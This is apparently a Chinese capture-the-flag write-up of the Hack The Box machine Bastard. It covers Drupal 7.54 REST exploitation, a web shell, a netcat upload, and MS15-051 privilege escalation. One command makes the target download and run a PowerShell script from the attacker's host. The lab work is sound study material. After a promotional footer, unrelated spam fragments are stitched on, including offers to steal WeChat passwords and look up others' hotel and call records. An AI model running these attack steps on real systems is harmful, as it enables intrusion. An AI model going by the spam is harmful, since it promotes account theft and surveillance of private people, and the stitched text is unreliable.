Ms08067安全实验
这次挑战的是 HTB 的第7台靶机:Bastard
技能收获:
PHP Unserilaize
CMS Version Identify
Windows privilege escalation :Sherlock
Bastard IP:10.10.10.9
Kali IP:10.10.14.23
发现开启了80(IIS),访问之
看起来是drupal cms,访问 robots.txt ,发现版本变更文件
版本:Drupal 7.54
searchsploit drupal 7.x
该版本存在 rce ,编辑 exploit
该exploit会攻击由服务扩展创建的REST端点,我们只需要找出REST端点的名称即可利用该漏洞。
通过目录枚举,我们发现 endpoint 为 /rest,用其替换exploit
没有反应,挂上 burpsuite 看看
设置 exp 的target为 burp 的监听端口
依然没回应,那应该是缺少php包,未成功发送
检查发现,Kali缺少 php-curl 包,安装好成功返回响应并写入 shell.php
利用 session.json 可以伪造会话,成功登录
已知目标是 x64 的系统,我们上传 nc.exe
下载地址:https://eternallybored.org/misc/netcat/
给 exp 添加一个文件上传功能,也可以使用 *** b文件共享,使用上传
Sherlock是一个在Windows下用于本地提权的PowerShell脚本
http://10.10.10.9/cmd.php?fexec=echo IEX(New-Object System.Net.Webclient).DownloadString('http://10.10.14.15:8000/Sherlock.ps1') | powershell -noprofile -
提示 ms15-051 , 利用之
提权程序下载地址:https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS15-051/MS15-051-KB3045171.zip
上传并运行
建立 nc 会话
至此完成
Drupal 7.x RCE 漏洞分析 附EXP:
https://www.xctf.org.cn/library/details/58bd0f2c4d4c77aef7d15787cb65008a6533b87a/
<br>
MS08067实验室官网:www.ms08067.com
公众号:"?Ms08067安全实验室"
Ms08067安全实验室目前开放知识星球:?WEB安全攻防,内网安全攻防,Python安全攻防,KALI?Linux安全攻防,二进制逆向入门
最后期待各位小伙伴的加入!
怎么查询在哪里开过房(怎么知道老婆和别人同个房) 专业盗取微信密码,开房查询,通话记录查询,查询微信聊天记录,非常靠谱!一 * 人生走着走着就开阔了,现在的你,不用着急。让未来的,本就该属于你的树再...
黑客工具全是病原体但是又分成有侧门和无侧门无侧门的相对性安全.有的专用工具能够,如今的说白了网络黑客都并不是真实实际意义上的网络黑客,真实的妙手都会科学研究自身很感兴趣的。 你能问下这名或许帮上您 方...
三围是什么意思(三围的测量方法) 三围是女性的胸围(bust)、腰围(Waist)、臀围(hips)三者的合称。 曲线美是衡量女性形体美的重要标志,而女性“三围”又是构成曲线美的核心因素。那么,怎...
开启pr,将素材图片拖入时间线,然后在新项目对话框点击鼠标点击,新建项目,外挂字幕,外挂字幕规范的下拉列表中挑选敞开式外挂字幕,明确,双击鼠标新创建好的外挂字幕,编辑框内键入外挂字幕內容,进行后关掉外...
历史时间不止一次地告知了大家政冶暗杀的不一样使用价值。假如你不可以和弗雷德里希·伊里奇·乌里扬诺夫一样以战斗力打倒一个(或一群)独裁者,那麼克劳斯·冯·施陶芬贝格的方式便是反抗者们最行得通的挑选。...
查对方微信密码(弄到别人微信密码方法),你不行能彻底掌握一片面。你当今在一路的是恋爱吗?你奈何晓得你们不是在合资生存呢?无论你做甚么,没有你的心呆在这里是没有效的。这也意味着你不是你想要的人。我想,没...